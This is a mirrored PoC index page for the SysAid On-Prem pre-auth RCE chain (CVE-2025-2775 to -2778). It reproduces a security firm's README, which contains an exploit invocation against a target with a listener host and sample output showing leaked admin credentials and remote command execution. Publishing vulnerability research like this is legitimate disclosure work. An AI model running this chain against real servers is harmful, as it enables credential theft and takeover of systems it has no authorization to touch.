Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-2775 PoC — SysAid On-Prem 安全漏洞

Source
https://github.com/watchtowrlabs/watchTowr-vs-SysAid-PreAuth-RCE-Chain
Associated Vulnerability
Title:SysAid On-Prem 安全漏洞 (CVE-2025-2775)
Description:SysAid On-Prem是以色列SysAid公司的一个本地化部署的IT服务管理(ITSM)平台。 SysAid On-Prem 23.3.40及之前版本存在安全漏洞,该漏洞源于Checkin处理功能中存在未经验证的XML外部实体漏洞,可能导致管理员账户接管和文件读取。
Description
PoC for SysAid PreAuth RCE Chain (CVE-2025-2775, CVE-2025-2776, CVE-2025-2777, CVE-2025-2778)
Readme
# SysAid PreAuth RCE Chain PoC

PoC for SysAid PreAuth RCE Chain (CVE-2025-2775, CVE-2025-2776, CVE-2025-2777, CVE-2025-2778)
 
 See our [blog post](https://labs.watchtowr.com/) for technical details
 


https://github.com/user-attachments/assets/03245fab-915d-43b6-8e91-f0a18251af49



# PoC in Action


```

python watchTowr-vs-SysAid-PreAuth-RCE-Chain.py -t http://192.168.201.217:8080/ -l 192.168.201.1 -c "whoami"

                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-SysAid-PreAuth-RCE-Chain.py

        (*) SysAid Pre-Auth RCE Chain

          - Sina Kheirkhah (@SinSinology) and Jake Knott of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2025-2775, CVE-2025-2776, CVE-2025-2777, CVE-2025-2778]

[+] Starting HTTP server on port 80
[*] Leaking creds...
[+] Leaked credentials: admin:Aa123456
[+] Successfully logged in
[+] Extracted token
[*] Poisoning with commands
[+] Commands executed successfully
[*] Done


```

# Affected Versions

The following versions are vulnerable to this pre-auth RCE chain: `<= 23.3.40`, vendor release note can be found [here](https://documentation.sysaid.com/docs/24-40-60)



# Follow [watchTowr](https://watchTowr.com) Labs

For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team 

- https://labs.watchtowr.com/
- https://x.com/watchtowrcyber
File Snapshot

 [4.0K]  /data/pocs/ab16af50cb657c53e61f4ba2a5ba9424eac4687d
├── [1.7K]  README.md
└── [4.8K]  watchTowr-vs-SysAid-PreAuth-RCE-Chain.py

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.